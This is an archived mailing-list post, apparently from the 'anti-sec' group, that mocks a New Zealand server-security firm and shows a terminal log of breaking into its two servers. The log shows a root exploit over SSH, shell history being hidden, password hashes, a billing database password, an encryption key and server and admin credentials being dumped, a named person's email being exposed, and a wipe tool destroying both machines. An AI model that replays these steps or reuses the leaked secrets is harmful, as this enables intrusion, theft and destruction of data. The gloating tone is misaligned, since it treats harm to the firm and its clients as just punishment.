Full Disclosure mailing list archives

SSANZ - Server Systems Administration NZ.
From: srshaxsir () hushmail com
Date: Sat, 04 Jul 2009 12:07:30 +0300



                       __  .__
        _____    _____/  |_|__|           ______ ____   ____
        \__  \  /    \   __\  |  ______  /  ___// __ \_/ ___\
         / __ \|   |  \  | |  | /_____/  \___ \\  ___/\  \___
        (____  /___|  /__| |__|         /____  >\___  >\___  >
             \/     \/                       \/     \/     \/

Some of you have seen a lot of casualties lately in the webhosting scene: hosting companies being wiped and rm'd at the expense of their clients. While some of this is collateral damage, we're about to show you, ladies and gentlemen, that sometimes you aren't pwned because of who you host but what you say.

Practice what you preach.

- Why SSANZ?

SSANZ is owned by a kid who claims he can manage, secure and audit servers; he offers a service that he clearly cannot provide, and we are against that.


LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:

Logan of New Zealand. CEO of Server Systems Administration NZ.

Signature:
Server Systems Administration NZ | SSANZ
Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
Affordable Hosting :: Resellers, Shared & Dedicated Server Systems

Server Management $25 - Security & Hardening - $50
<http://www.webhostingtalk.com/showthread.php?t=857383>:


Server Management - $25 Per Month

- Full Management - Support, & 3rd Party Installs
- Monitoring - Included - up to 3 ports.
- Emergency Recovery


Server Security - $50

- Initial Scan & Report
- Security Hardening & Security Installs/tweaks.
- IDS, Security Monitoring & mod_sec configured.
- Finishing Security Scan & SSANZ Custom Scans.


Emergency Server Recovery - $150

- Recover Hacked Server Systems
- Recover deleted data
- ANTI-dDOS Services
- dDOS Investigation

Security Worries? Security Audits - 50% OFF
<http://www.webhostingtalk.com/showthread.php?t=859795>:

Get your site/server audited to ensure your business data is
secure before you become a statistic.

In the past 6 months, e-crime activity reports have increased by
45% due to the global economic recession.

What is involved in a Full Security Audit?

External Security

   * Scan for Shells/malicious scripts
   * Scan for vulnerable web content ( permissions, RFI's )
   * Scans for Vulnerable Server Services
   * Vulnerable Ports
   * Testing of TCP handling - dDOS test.
   * Scan for Vulnerable PHP scripts/mods.
   * Control Panel Security Audit ( external )
   * Multiple Unique SSANZ Custom Scans*


Internal Security

   * Permissions/Ownership(s) Review
   * Apache/Webserver Security
   * User Account Security & binaries access audit
   * Local RFI Exploits located/patched.
   * System Binary Security Audit
   * Firewall/IPTABLES Audit
   * Bruteforce detection test & audit
   * Root Access Authentication Audit
   * Local PHP Functions Audit
   * Control Panel Security Audit ( Internal )
   * Kernel Security Audit
   * Additional SSANZ Custom Scans/Audit*

We at anti-sec decided to give you a _FREE_ Full Security Audit!*

* `rm -rf /` is included.


anti-sec:~/pwn# ./map ssanz.net

        IP: 66.197.143.133 ( osiris.ssanz.net )
        WWW: Apache/2.2.11
        SSH: SSH-2.0-OpenSSH_4.3

        IP: 66.197.204.101 ( devil.ssanz.net )
        WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
        SSH: SSH-2.0-OpenSSH_4.3

anti-sec:~/pwn# cd xpl/

anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22

                [+] 0wn0wn - anti-sec group
                [+] Target: 66.197.143.133
                [+] SSH Port: 22

                [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

sh-3.2# export HISTFILE=/dev/null

sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata
#1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::

sh-3.2# w
 03:43:43 up 7 days, 54 min,  1 user,  load average: 9.01, 9.78, 10.73
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224  20:17    7:26m 13:18  13:18  htop

sh-3.2# pwd
/root

sh-3.2# ls -la
total 3008
drwxr-x--- 24 root     root        4096 Jul  4 03:43 .
drwxr-xr-x 27 root     root        4096 Jun 27 02:49 ..
-rw-------  1 root     root         957 Jun 13 07:24 .accesshash
-rw-------  1 root     root        1012 Jun  1 10:39 anaconda-ks.cfg
-rw-------  1 root     root       15460 Jul  3 23:38 .bash_history
-rw-r--r--  1 root     root          24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root     root         191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root     root         176 Jan  6  2007 .bashrc
drwxrwxrwx  3 therockm therockm    4096 Jun  5 07:26 bwm-ng-0.6
-rw-r--r--  1 root     root      141564 Mar  1  2007 bwm-ng-0.6.tar.gz
drwxr-xr-x  3 root     root        4096 Nov 15  2006 cmm
-rw-r--r--  1 root     root       18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x  3 root     root        4096 Nov  5  2006 cmq
-rw-r--r--  1 root     root       14507 Oct 10  2008 cmq.tgz
drwxr-xr-x  4 root     root        4096 Jun  1 14:33 .cpanel
drwxr-xr-x  4 root     root        4096 Jun  1 17:10 cpanel3-skel
drwx------  3 root     root        4096 Jun  1 13:50 .cpobjcache
drwxr-xr-x 10 root     root        4096 Apr 13 16:17 csf
-rw-r--r--  1 root     root      430121 May 15 12:07 csf.tgz
-rw-r--r--  1 root     root         100 Jan  6  2007 .cshrc
drwx------  2 root     root        4096 Jun  1 13:54 .elinks
-rw-r--r--  1 root     root     1176672 Jul  4 03:40 error_log
-rw-r--r--  1 root     root          16 Jun  3 08:34 .forward
drwx------  3 root     root        4096 Jun  1 10:39 .gconf
drwx------  2 root     root        4096 Jun  1 10:39 .gconfd
drwxr-xr-x  4 root     root        4096 Jun 10 23:42 .gem
drwx------  2 root     root        4096 Jun  1 13:55 .gnupg
drwxrwxrwx  5 theweath theweath    4096 Jun  1 17:13 htop-0.8.1
-rw-r--r--  1 root     root      414870 Sep 23  2008 htop-0.8.1.tar.gz
-rw-r--r--  1 root     root         561 Jun 27 02:48 .htoprc
-rw-r--r--  1 root     root        8144 Jun  6 19:23 index.html
-rw-r--r--  1 root     root        4246 Jun  1 10:39 install.log.syslog
drwxr-xr-x  6      500 root        4096 Sep 13  2005 iptraf-3.0.0
-rw-r--r--  1 root     root           0 Jun 27 09:21 iptraf-3.0.0.tar.gz
-rw-r--r--  1 root     root           0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
-rw-r--r--  1 root     root           0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
-rw-r--r--  1 root     root      575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
drwx------  6 root     root        4096 Jun  1 14:21 .MirrorSearch
-rw-------  1 root     root          61 Jun 12 21:04 .my.cnf
-rw-------  1 root     root         139 Jul  3 10:51 .mysql_history
-rwxrwxrwx  1 root     root       38688 Dec  1  2008 mysqltuner.pl
-rw-r--r--  1 root     root         264 Jul  2 21:43 .pearrc
drwxr-xr-x  2 root     root        4096 Jun  1 17:04 public_ftp
drwxr-xr-x  3 root     root        4096 Jun  1 17:04 public_html
-rw-------  1 root     root        1024 Jun  7 19:50 .rnd
drwx------  3 root     root        4096 Jun  1 14:29 .spamassassin
drwx------  2 root     root        4096 Jun  2 06:41 .ssh
-rw-r--r--  1 root     root         129 Jan  6  2007 .tcshrc
drwxr-xr-x  3 root     root        4096 Jun  7 21:54 tmp
-rw-------  1 root     root           0 Jun  7 22:01 .trustwavereqs
drw-------  2 root     root        4096 Jun  3 08:18 whmrbackups
drw-------  3 root     root        4096 Jun 10 08:25 whmrcorebackups



sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
ps -aux|grep -i HTTP|wc -l
w
bwm-ng
[snip]
netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
[snip]
service cups stop
chkconfig cups off
service nfslock stop
chkconfig nfslock off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
[snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install

sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan

sh-3.2# lastlog | grep -v Never
Username         Port     From             Latest
root             pts/1    125.238.144.224  Fri Jul  3 20:27:03 -0400 2009
simmobim         pts/0    118.69.80.114    Fri Jun 12 00:22:04 -0400 2009
mattss           pts/1    118.90.48.0      Sun Jun 21 04:44:58 -0400 2009
etasmtco         pts/0    189.31.24.129    Sat Jun 20 10:14:51 -0400 2009

sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x  15 billing billing     4096 Jun 28 02:08 .
drwx--x--x 737 root    root       20480 Jul  4 00:37 ..
lrwxrwxrwx   1 billing billing       33 Jun  2 01:58 access-logs -> /usr/local/apache/domlogs/billing
-rw-------   1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
-rw-------   1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
-rw-------   1 billing billing 84475934 Jun  3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
-rw-------   1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
-rw-r--r--   1 billing billing       24 May 27  2008 .bash_logout
-rw-r--r--   1 billing billing      176 May 27  2008 .bash_profile
-rw-r--r--   1 billing billing      124 May 27  2008 .bashrc
-rw-------   1 billing billing       17 May 27  2008 .contactemail
drwxr-xr-x   5 billing billing     4096 May  8 02:48 .cpanel
-rw-r-----   1 billing billing        0 Apr  4 06:32 cpbackup-exclude.conf
drwxr-xr-x   2 billing billing     4096 Jun  2 01:57 cpmove.psql
drwxr-xr-x   3 billing billing     4096 Nov 12  2008 cpmove.psql.1240007789
drwxr-xr-x   2 billing billing     4096 Apr 16 23:24 cpmove.psql.1243922290
-rw-r--r--   1 billing billing   532304 Jul  4 03:45 error_log
drwxr-x---   4 billing mail        4096 Jan 19 21:39 etc
drwxr-x---   2 billing nobody      4096 May 27  2008 .htpasswds
-rw-r--r--   1 billing billing        7 Nov 12  2008 .lang
-rw-------   1 billing billing       15 Jun 28 02:07 .lastlogin
drwxrwx---  10 billing billing     4096 Jul  2 21:43 mail
drwxr-xr-x   4 billing billing     4096 Nov 12  2008 .mozilla
drwxr-xr-x   3 billing billing     4096 Apr 29  2008 public_ftp
drwxr-x---  24 billing nobody      4096 Jun 28 02:55 public_html
drwx------   4 billing billing     4096 Jun  7 21:53 ssl
drwxr-xr-x   7 billing billing     4096 Feb 25 17:59 tmp
drwx------   2 billing billing     4096 May 27  2008 .trash
lrwxrwxrwx   1 billing billing       11 Jun  2 01:58 www -> public_html
-rw-r--r--   1 billing billing      658 May 27  2008 .zshrc

sh-3.2# cd www/

sh-3.2# ls
admin                 banned.php             configuressl.php  domainchecker.php  init.php             logout.php            postinfo.html       templates        viewticket.php  whois.php
affiliates.php        billing                contact.php       downloads          installmingchowping  modules               _private            templates_c      _vti_bin
aff.php               cart.php               creditcard.php    downloads.php      knowledgebase.php    networkissues.php     register.php        tutorials.php    _vti_cnf
announcements.php     cgi-bin                dbconnect.php     htaccess.txt       lang                 networkissuesrss.php  serverstatus.php    upgrade          _vti_inf.html
announcementsrss.php  clientarea.php         display.php       images             libs                 order.php             status              upgrade.php      _vti_log
announcements.xml     configuration.php      dl.php            includes           link.php             passwordreminder.php  submitticket.php    viewemail.php    _vti_pvt
attachments           configuration.php.new  dologin.php       index.php          login.php            pipe                  supporttickets.php  viewinvoice.php  _vti_txt

sh-3.2# cat configuration.php
<?php
$license="93881365561d";
$db_host = "localhost";
$db_username = "billing_billusr";
$db_password = "X2qL6:qWCCb6";
$db_name = "billing_billing";
$cc_encryption_hash = "57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K";
$templates_compiledir = "templates_c/";
?>

sh-3.2# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use billing_billing;

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+----------------------------+
| Tables_in_billing_billing  |
+----------------------------+
| mod_ipmanager              |
| mod_ipmonitor              |
| tblaccounts                |
| tblactivitylog             |
| tbladdons                  |
| tbladminlog                |
| tbladminperms              |
| tbladminroles              |
| tbladmins                  |
| tbladminsecurityquestions  |
| tblaffiliates              |
| tblaffiliatesaccounts      |
| tblaffiliateshistory       |
| tblaffiliatespending       |
| tblaffiliateswithdrawals   |
| tblannouncements           |
| tblbannedemails            |
| tblbannedips               |
| tblbillableitems           |
| tblbrowserlinks            |
| tblcalendar                |
| tblcancelrequests          |
| tblclientgroups            |
| tblclients                 |
| tblconfiguration           |
| tblcontacts                |
| tblcredit                  |
| tblcurrencies              |
| tblcustomfields            |
| tblcustomfieldsvalues      |
| tbldomainpricing           |
| tbldomains                 |
| tbldomainsadditionalfields |
| tbldownloadcats            |
| tbldownloads               |
| tblemails                  |
| tblemailtemplates          |
| tblfraud                   |
| tblgatewaylog              |
| tblhosting                 |
| tblhostingaddons           |
| tblhostingconfigoptions    |
| tblinvoiceitems            |
| tblinvoices                |
| tblknowledgebase           |
| tblknowledgebasecats       |
| tblknowledgebaselinks      |
| tbllinks                   |
| tblnetworkissues           |
| tblnotes                   |
| tblorders                  |
| tblpaymentgateways         |
| tblpricing                 |
| tblproductconfiggroups     |
| tblproductconfiglinks      |
| tblproductconfigoptions    |
| tblproductconfigoptionssub |
| tblproductgroups           |
| tblproducts                |
| tblpromotions              |
| tblquoteitems              |
| tblquotes                  |
| tblregistrars              |
| tblservers                 |
| tblsslorders               |
| tbltax                     |
| tblticketbreaklines        |
| tblticketdepartments       |
| tblticketescalations       |
| tblticketlog               |
| tblticketmaillog           |
| tblticketnotes             |
| tblticketpredefinedcats    |
| tblticketpredefinedreplies |
| tblticketreplies           |
| tbltickets                 |
| tblticketspamfilters       |
| tbltodolist                |
| tblupgrades                |
| tblwhoislog                |
+----------------------------+
80 rows in set (0.00 sec)

mysql> select name,ipaddress,hostname,username,password from tblservers;
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| name         | ipaddress      | hostname         | username | password                                                                 |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| Osiris       | 66.197.143.133 | Osiris.ssanz.net | ssanz    | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=                             |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root     | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
| Devil        | 66.197.204.101 | devil.ssanz.net  | root     | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==             |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
3 rows in set (0.00 sec)

mysql> select firstname,lastname,email,username,password from tbladmins;
+-----------+----------+--------------------+----------+----------------------------------+
| firstname | lastname | email              | username | password                         |
+-----------+----------+--------------------+----------+----------------------------------+
| Logan     | Douglas  | Logan () ssanz net | Admin    | c6df529826cf16ac5bedb424d8ac972b |
+-----------+----------+--------------------+----------+----------------------------------+
1 row in set (0.06 sec)

mysql> quit
Bye


sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5             2.0G  477M  1.4G  26% /
/dev/sda8             875G  147G  684G  18% /home
/dev/sda3             9.7G  6.8G  2.5G  74% /usr
/dev/sda2             9.7G  7.0G  2.3G  76% /var
/dev/sda1              99M   23M   72M  24% /boot
/dev/sda6             996M   64M  881M   7% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1             459G  163G  273G  38% /backup

sh-3.2# ./wipe

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5              64Z   64Z  1.5G 100% /
/dev/sda8              64Z   64Z  729G 100% /home
/dev/sda3              64Z   64Z  3.0G 100% /usr
/dev/sda2              64Z   64Z  3.0G 100% /var
/dev/sda1              16Z   16Z     0 100% /boot
/dev/sda6              64Z   64Z  933M 100% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1              64Z   64Z  296G 100% /backup

sh-3.2# exit
exit

-----------------------------------

osiris                  [ DOWN ]
devil                   [  UP  ]

-----------------------------------

anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22

                [+] 0wn0wn - anti-sec group
                [+] Target: 66.197.204.101
                [+] SSH Port: 22

                [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

sh-3.2# export HISTFILE=/dev/null

sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::

sh-3.2# w
 04:10:20 up 4 days, 12:11,  1 user,  load average: 3.25, 2.09, 1.68
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224  20:18    7:51m  6:38   6:38  htop

sh-3.2# pwd
/root

sh-3.2# ls -la
total 1232
drwxr-x--- 23 root root   4096 Jul  4 04:06 .
drwxr-xr-x 25 root root   4096 Jun 29 14:33 ..
-rw-------  1 root root    957 Jun 13 05:20 .accesshash
-rw-------  1 root root    937 Jun 12 00:01 anaconda-ks.cfg
-rw-------  1 root root   7258 Jun 30 10:03 .bash_history
-rw-r--r--  1 root root     24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root    191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root    176 Jan  6  2007 .bashrc
drwxrwxrwx  3 1000 1000   4096 Jun 12 04:45 bwm-ng-0.6
-rw-r--r--  1 root root 141564 Mar  1  2007 bwm-ng-0.6.tar.gz
drwxr-xr-x  3 root root   4096 Nov  5  2006 cmq
-rw-r--r--  1 root root  14507 Oct 10  2008 cmq.tgz
drwxr-xr-x  4 root root   4096 Jun 12 02:51 .cpanel
drwxr-xr-x  4 root root   4096 Jun 12 03:26 cpanel3-skel
drwx------  3 root root   4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x  2 root root   4096 Aug 21  2006 cse
-rw-r--r--  1 root root  12207 Oct 10  2008 cse.tgz
drwxr-xr-x 10 root root   4096 Jun  5 05:05 csf
-rw-r--r--  1 root root 431490 Jun  5 10:52 csf.tgz
-rw-r--r--  1 root root    100 Jan  6  2007 .cshrc
drwx------  2 root root   4096 Jun 12 01:51 .elinks
-rw-r--r--  1 root root     16 Jun 13 15:33 .forward
drwx------  3 root root   4096 Jun 11 23:59 .gconf
drwx------  2 root root   4096 Jun 11 23:59 .gconfd
drwxr-xr-x  4 root root   4096 Jun 12 04:29 .gem
drwx------  2 root root   4096 Jun 12 01:53 .gnupg
drwxrwxrwx  6 1002 1002   4096 Jun 12 04:24 htop-0.8.1
-rw-r--r--  1 root root 414870 Sep 23  2008 htop-0.8.1.tar.gz
-rw-r--r--  1 root root    561 Jun 12 23:31 .htoprc
-rw-r--r--  1 root root   4239 Jun 12 00:01 install.log.syslog
drwx------  6 root root   4096 Jun 12 02:33 .MirrorSearch
-rw-------  1 root root     37 Jun 12 02:11 .my.cnf
drwxr-xr-x  3 1000 1000   4096 Jun 12 05:42 mytop-1.6
-rw-r--r--  1 root root  19720 Feb 16  2007 mytop-1.6.tar.gz
-rw-r--r--  1 root root    264 Jun 23 00:23 .pearrc
drwxr-xr-x  2 root root   4096 Jun 12 03:21 public_ftp
drwxr-xr-x  3 root root   4096 Jun 12 03:21 public_html
-rw-------  1 root root   1024 Jun 12 02:50 .rnd
drwx------  3 root root   4096 Jun 12 02:41 .spamassassin
drwx------  2 root root   4096 Jun 22 09:11 .ssh
-rw-r--r--  1 root root    129 Jan  6  2007 .tcshrc
drwxr-xr-x  3 root root   4096 Jun 12 02:40 tmp
drwxr-xr-x  2 root root   4096 Jun 16 19:23 .wapi

sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html
cd /home
cd visit4ca
cd public_html
ls
tar zxvf mainfiles.tar.gz
[snip]
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso

sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              31G  7.5G   22G  26% /
/dev/sdb1             452G   35G  394G   9% /home
/dev/sda1              99M   23M   72M  24% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp

sh-3.2# who
root     pts/0        2009-07-03 20:18 (125.238.144.224)

sh-3.2# ./wipe

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              64Z   64Z   24G 100% /
/dev/sdb1              64Z   64Z  417G 100% /home
/dev/sda1              16Z   16Z   77M 100% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp

sh-3.2# exit
exit


-----------------------------------

osiris                  [ DOWN ]
devil                   [ DOWN ]

-----------------------------------

Once again, practice what you preach. Don't claim to be something you're not. Most importantly, don't go after us. We're not the problem. What you say does not align AT ALL with what you actually do with your servers.

Fix that first, you dig?

~ There will always be no way out.